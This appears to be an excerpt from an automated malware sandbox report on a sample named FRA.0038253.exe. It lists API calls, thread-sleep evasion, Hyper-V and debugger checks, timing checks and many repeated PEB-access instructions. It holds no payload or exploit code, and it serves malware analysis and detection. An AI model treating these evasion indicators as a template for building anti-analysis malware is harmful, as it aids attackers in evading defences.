        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe TID: 6464Thread sleep count: 74 > 30Jump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe TID: 6464Thread sleep time: -74000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\runas.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 0_2_00405A19 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405A19
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 0_2_004065EA FindFirstFileA,FindClose,0_2_004065EA
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 0_2_004027CF FindFirstFileA,0_2_004027CF
        Source: FRA.0038253.exe, 00000003.00000003.2938213391.0000000005315000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
        Source: FRA.0038253.exe, 00000003.00000003.2868616234.0000000005355000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Users\user\Desktop\FRA.0038253.exeAPI call chain: ExitProcess graph end nodegraph_0-4371
        Source: C:\Users\user\Desktop\FRA.0038253.exeAPI call chain: ExitProcess graph end nodegraph_0-4535
        Source: C:\Windows\SysWOW64\runas.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35721763 rdtsc 3_2_35721763
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357234E0 NtCreateMutant,LdrInitializeThunk,3_2_357234E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 0_2_70751B28 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_70751B28
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35769567 mov eax, dword ptr fs:[00000030h]3_2_35769567
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579B56E mov eax, dword ptr fs:[00000030h]3_2_3579B56E
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579B56E mov ecx, dword ptr fs:[00000030h]3_2_3579B56E
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579B56E mov eax, dword ptr fs:[00000030h]3_2_3579B56E
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357BB55F mov eax, dword ptr fs:[00000030h]3_2_357BB55F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357BB55F mov eax, dword ptr fs:[00000030h]3_2_357BB55F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3571F523 mov eax, dword ptr fs:[00000030h]3_2_3571F523
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356D753F mov eax, dword ptr fs:[00000030h]3_2_356D753F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356D753F mov eax, dword ptr fs:[00000030h]3_2_356D753F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356D753F mov eax, dword ptr fs:[00000030h]3_2_356D753F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35711527 mov eax, dword ptr fs:[00000030h]3_2_35711527
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E3536 mov eax, dword ptr fs:[00000030h]3_2_356E3536
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E3536 mov eax, dword ptr fs:[00000030h]3_2_356E3536
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578F51B mov eax, dword ptr fs:[00000030h]3_2_3578F51B
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578F51B mov eax, dword ptr fs:[00000030h]3_2_3578F51B
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578F51B mov eax, dword ptr fs:[00000030h]3_2_3578F51B
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578F51B mov eax, dword ptr fs:[00000030h]3_2_3578F51B
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578F51B mov eax, dword ptr fs:[00000030h]3_2_3578F51B
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578F51B mov eax, dword ptr fs:[00000030h]3_2_3578F51B
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578F51B mov ecx, dword ptr fs:[00000030h]3_2_3578F51B
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578F51B mov ecx, dword ptr fs:[00000030h]3_2_3578F51B
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578F51B mov eax, dword ptr fs:[00000030h]3_2_3578F51B
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578F51B mov eax, dword ptr fs:[00000030h]3_2_3578F51B
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578F51B mov eax, dword ptr fs:[00000030h]3_2_3578F51B
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578F51B mov eax, dword ptr fs:[00000030h]3_2_3578F51B
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578F51B mov eax, dword ptr fs:[00000030h]3_2_3578F51B
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35701514 mov eax, dword ptr fs:[00000030h]3_2_35701514
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35701514 mov eax, dword ptr fs:[00000030h]3_2_35701514
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35701514 mov eax, dword ptr fs:[00000030h]3_2_35701514
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35701514 mov eax, dword ptr fs:[00000030h]3_2_35701514
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35701514 mov eax, dword ptr fs:[00000030h]3_2_35701514
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35701514 mov eax, dword ptr fs:[00000030h]3_2_35701514
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DB502 mov eax, dword ptr fs:[00000030h]3_2_356DB502
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579550D mov eax, dword ptr fs:[00000030h]3_2_3579550D
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579550D mov eax, dword ptr fs:[00000030h]3_2_3579550D
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579550D mov eax, dword ptr fs:[00000030h]3_2_3579550D
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356EB5E0 mov eax, dword ptr fs:[00000030h]3_2_356EB5E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356EB5E0 mov eax, dword ptr fs:[00000030h]3_2_356EB5E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356EB5E0 mov eax, dword ptr fs:[00000030h]3_2_356EB5E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356EB5E0 mov eax, dword ptr fs:[00000030h]3_2_356EB5E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356EB5E0 mov eax, dword ptr fs:[00000030h]3_2_356EB5E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356EB5E0 mov eax, dword ptr fs:[00000030h]3_2_356EB5E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357655E0 mov eax, dword ptr fs:[00000030h]3_2_357655E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357115EF mov eax, dword ptr fs:[00000030h]3_2_357115EF
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3576B5D3 mov eax, dword ptr fs:[00000030h]3_2_3576B5D3
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF5C7 mov eax, dword ptr fs:[00000030h]3_2_356DF5C7
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF5C7 mov eax, dword ptr fs:[00000030h]3_2_356DF5C7
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF5C7 mov eax, dword ptr fs:[00000030h]3_2_356DF5C7
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF5C7 mov eax, dword ptr fs:[00000030h]3_2_356DF5C7
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF5C7 mov eax, dword ptr fs:[00000030h]3_2_356DF5C7
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF5C7 mov eax, dword ptr fs:[00000030h]3_2_356DF5C7
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF5C7 mov eax, dword ptr fs:[00000030h]3_2_356DF5C7
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF5C7 mov eax, dword ptr fs:[00000030h]3_2_356DF5C7
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF5C7 mov eax, dword ptr fs:[00000030h]3_2_356DF5C7
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35787591 mov edi, dword ptr fs:[00000030h]3_2_35787591
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35719580 mov eax, dword ptr fs:[00000030h]3_2_35719580
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35719580 mov eax, dword ptr fs:[00000030h]3_2_35719580
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579F582 mov eax, dword ptr fs:[00000030h]3_2_3579F582
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579F478 mov eax, dword ptr fs:[00000030h]3_2_3579F478
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3571D450 mov eax, dword ptr fs:[00000030h]3_2_3571D450
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3571D450 mov eax, dword ptr fs:[00000030h]3_2_3571D450
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356ED454 mov eax, dword ptr fs:[00000030h]3_2_356ED454
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356ED454 mov eax, dword ptr fs:[00000030h]3_2_356ED454
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356ED454 mov eax, dword ptr fs:[00000030h]3_2_356ED454
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356ED454 mov eax, dword ptr fs:[00000030h]3_2_356ED454
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356ED454 mov eax, dword ptr fs:[00000030h]3_2_356ED454
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356ED454 mov eax, dword ptr fs:[00000030h]3_2_356ED454
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579D430 mov eax, dword ptr fs:[00000030h]3_2_3579D430
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579D430 mov eax, dword ptr fs:[00000030h]3_2_3579D430
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DB420 mov eax, dword ptr fs:[00000030h]3_2_356DB420
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35717425 mov eax, dword ptr fs:[00000030h]3_2_35717425
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35717425 mov ecx, dword ptr fs:[00000030h]3_2_35717425
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3577B420 mov eax, dword ptr fs:[00000030h]3_2_3577B420
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3577B420 mov eax, dword ptr fs:[00000030h]3_2_3577B420
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3576F42F mov eax, dword ptr fs:[00000030h]3_2_3576F42F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3576F42F mov eax, dword ptr fs:[00000030h]3_2_3576F42F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3576F42F mov eax, dword ptr fs:[00000030h]3_2_3576F42F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3576F42F mov eax, dword ptr fs:[00000030h]3_2_3576F42F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3576F42F mov eax, dword ptr fs:[00000030h]3_2_3576F42F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35769429 mov eax, dword ptr fs:[00000030h]3_2_35769429
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579F409 mov eax, dword ptr fs:[00000030h]3_2_3579F409
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579F4FD mov eax, dword ptr fs:[00000030h]3_2_3579F4FD
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357094FA mov eax, dword ptr fs:[00000030h]3_2_357094FA
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357154E0 mov eax, dword ptr fs:[00000030h]3_2_357154E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570F4D0 mov eax, dword ptr fs:[00000030h]3_2_3570F4D0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570F4D0 mov eax, dword ptr fs:[00000030h]3_2_3570F4D0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570F4D0 mov eax, dword ptr fs:[00000030h]3_2_3570F4D0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570F4D0 mov eax, dword ptr fs:[00000030h]3_2_3570F4D0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570F4D0 mov eax, dword ptr fs:[00000030h]3_2_3570F4D0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570F4D0 mov eax, dword ptr fs:[00000030h]3_2_3570F4D0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570F4D0 mov eax, dword ptr fs:[00000030h]3_2_3570F4D0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570F4D0 mov eax, dword ptr fs:[00000030h]3_2_3570F4D0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570F4D0 mov eax, dword ptr fs:[00000030h]3_2_3570F4D0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357014C9 mov eax, dword ptr fs:[00000030h]3_2_357014C9
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357014C9 mov eax, dword ptr fs:[00000030h]3_2_357014C9
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357014C9 mov eax, dword ptr fs:[00000030h]3_2_357014C9
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357014C9 mov eax, dword ptr fs:[00000030h]3_2_357014C9
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357014C9 mov eax, dword ptr fs:[00000030h]3_2_357014C9
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357954B0 mov eax, dword ptr fs:[00000030h]3_2_357954B0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357954B0 mov ecx, dword ptr fs:[00000030h]3_2_357954B0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3576D4A0 mov ecx, dword ptr fs:[00000030h]3_2_3576D4A0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3576D4A0 mov eax, dword ptr fs:[00000030h]3_2_3576D4A0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3576D4A0 mov eax, dword ptr fs:[00000030h]3_2_3576D4A0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3571B490 mov eax, dword ptr fs:[00000030h]3_2_3571B490
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3571B490 mov eax, dword ptr fs:[00000030h]3_2_3571B490
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35785490 mov eax, dword ptr fs:[00000030h]3_2_35785490
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35785490 mov eax, dword ptr fs:[00000030h]3_2_35785490
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35785490 mov eax, dword ptr fs:[00000030h]3_2_35785490
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35785490 mov eax, dword ptr fs:[00000030h]3_2_35785490
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35785490 mov eax, dword ptr fs:[00000030h]3_2_35785490
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35785490 mov eax, dword ptr fs:[00000030h]3_2_35785490
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35785490 mov eax, dword ptr fs:[00000030h]3_2_35785490
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35721763 mov eax, dword ptr fs:[00000030h]3_2_35721763
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35721763 mov eax, dword ptr fs:[00000030h]3_2_35721763
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35721763 mov eax, dword ptr fs:[00000030h]3_2_35721763
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35721763 mov eax, dword ptr fs:[00000030h]3_2_35721763
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35721763 mov eax, dword ptr fs:[00000030h]3_2_35721763
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35721763 mov eax, dword ptr fs:[00000030h]3_2_35721763
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35713740 mov eax, dword ptr fs:[00000030h]3_2_35713740
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF75B mov eax, dword ptr fs:[00000030h]3_2_356DF75B
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF75B mov eax, dword ptr fs:[00000030h]3_2_356DF75B
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF75B mov eax, dword ptr fs:[00000030h]3_2_356DF75B
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF75B mov eax, dword ptr fs:[00000030h]3_2_356DF75B
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF75B mov eax, dword ptr fs:[00000030h]3_2_356DF75B
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF75B mov eax, dword ptr fs:[00000030h]3_2_356DF75B
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF75B mov eax, dword ptr fs:[00000030h]3_2_356DF75B
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF75B mov eax, dword ptr fs:[00000030h]3_2_356DF75B
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF75B mov eax, dword ptr fs:[00000030h]3_2_356DF75B
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3571174A mov eax, dword ptr fs:[00000030h]3_2_3571174A
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3576174B mov eax, dword ptr fs:[00000030h]3_2_3576174B
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3576174B mov ecx, dword ptr fs:[00000030h]3_2_3576174B
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35709723 mov eax, dword ptr fs:[00000030h]3_2_35709723
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DB705 mov eax, dword ptr fs:[00000030h]3_2_356DB705
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DB705 mov eax, dword ptr fs:[00000030h]3_2_356DB705
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DB705 mov eax, dword ptr fs:[00000030h]3_2_356DB705
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DB705 mov eax, dword ptr fs:[00000030h]3_2_356DB705
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356ED700 mov ecx, dword ptr fs:[00000030h]3_2_356ED700
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579F717 mov eax, dword ptr fs:[00000030h]3_2_3579F717
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357A970B mov eax, dword ptr fs:[00000030h]3_2_357A970B
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357A970B mov eax, dword ptr fs:[00000030h]3_2_357A970B
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E37E4 mov eax, dword ptr fs:[00000030h]3_2_356E37E4
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E37E4 mov eax, dword ptr fs:[00000030h]3_2_356E37E4
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E37E4 mov eax, dword ptr fs:[00000030h]3_2_356E37E4
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E37E4 mov eax, dword ptr fs:[00000030h]3_2_356E37E4
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E37E4 mov eax, dword ptr fs:[00000030h]3_2_356E37E4
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E37E4 mov eax, dword ptr fs:[00000030h]3_2_356E37E4
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E37E4 mov eax, dword ptr fs:[00000030h]3_2_356E37E4
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E77F9 mov eax, dword ptr fs:[00000030h]3_2_356E77F9
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E77F9 mov eax, dword ptr fs:[00000030h]3_2_356E77F9
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579F7CF mov eax, dword ptr fs:[00000030h]3_2_3579F7CF
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357B17BC mov eax, dword ptr fs:[00000030h]3_2_357B17BC
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357AD7A7 mov eax, dword ptr fs:[00000030h]3_2_357AD7A7
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357AD7A7 mov eax, dword ptr fs:[00000030h]3_2_357AD7A7
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357AD7A7 mov eax, dword ptr fs:[00000030h]3_2_357AD7A7
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35711796 mov eax, dword ptr fs:[00000030h]3_2_35711796
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35711796 mov eax, dword ptr fs:[00000030h]3_2_35711796
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357BB781 mov eax, dword ptr fs:[00000030h]3_2_357BB781
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357BB781 mov eax, dword ptr fs:[00000030h]3_2_357BB781
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F3660 mov eax, dword ptr fs:[00000030h]3_2_356F3660
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F3660 mov eax, dword ptr fs:[00000030h]3_2_356F3660
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F3660 mov eax, dword ptr fs:[00000030h]3_2_356F3660
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356D7662 mov eax, dword ptr fs:[00000030h]3_2_356D7662
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356D7662 mov eax, dword ptr fs:[00000030h]3_2_356D7662
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356D7662 mov eax, dword ptr fs:[00000030h]3_2_356D7662
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35775660 mov eax, dword ptr fs:[00000030h]3_2_35775660
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3576166E mov eax, dword ptr fs:[00000030h]3_2_3576166E
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3576166E mov eax, dword ptr fs:[00000030h]3_2_3576166E
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3576166E mov eax, dword ptr fs:[00000030h]3_2_3576166E
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35715654 mov eax, dword ptr fs:[00000030h]3_2_35715654
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DD64A mov eax, dword ptr fs:[00000030h]3_2_356DD64A
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DD64A mov eax, dword ptr fs:[00000030h]3_2_356DD64A
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E3640 mov eax, dword ptr fs:[00000030h]3_2_356E3640
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356FF640 mov eax, dword ptr fs:[00000030h]3_2_356FF640
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356FF640 mov eax, dword ptr fs:[00000030h]3_2_356FF640
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356FF640 mov eax, dword ptr fs:[00000030h]3_2_356FF640
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E965A mov eax, dword ptr fs:[00000030h]3_2_356E965A
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E965A mov eax, dword ptr fs:[00000030h]3_2_356E965A
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E5622 mov eax, dword ptr fs:[00000030h]3_2_356E5622
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E5622 mov eax, dword ptr fs:[00000030h]3_2_356E5622
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E7623 mov eax, dword ptr fs:[00000030h]3_2_356E7623
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3571F63F mov eax, dword ptr fs:[00000030h]3_2_3571F63F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3571F63F mov eax, dword ptr fs:[00000030h]3_2_3571F63F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578D62C mov ecx, dword ptr fs:[00000030h]3_2_3578D62C
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578D62C mov ecx, dword ptr fs:[00000030h]3_2_3578D62C
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578D62C mov eax, dword ptr fs:[00000030h]3_2_3578D62C
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570D600 mov eax, dword ptr fs:[00000030h]3_2_3570D600
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570D600 mov eax, dword ptr fs:[00000030h]3_2_3570D600
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35769603 mov eax, dword ptr fs:[00000030h]3_2_35769603
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579F607 mov eax, dword ptr fs:[00000030h]3_2_3579F607
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3571360F mov eax, dword ptr fs:[00000030h]3_2_3571360F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35773608 mov eax, dword ptr fs:[00000030h]3_2_35773608
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35773608 mov eax, dword ptr fs:[00000030h]3_2_35773608
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35773608 mov eax, dword ptr fs:[00000030h]3_2_35773608
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35773608 mov eax, dword ptr fs:[00000030h]3_2_35773608
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35773608 mov eax, dword ptr fs:[00000030h]3_2_35773608
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35773608 mov eax, dword ptr fs:[00000030h]3_2_35773608
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356D96E0 mov eax, dword ptr fs:[00000030h]3_2_356D96E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356D96E0 mov eax, dword ptr fs:[00000030h]3_2_356D96E0
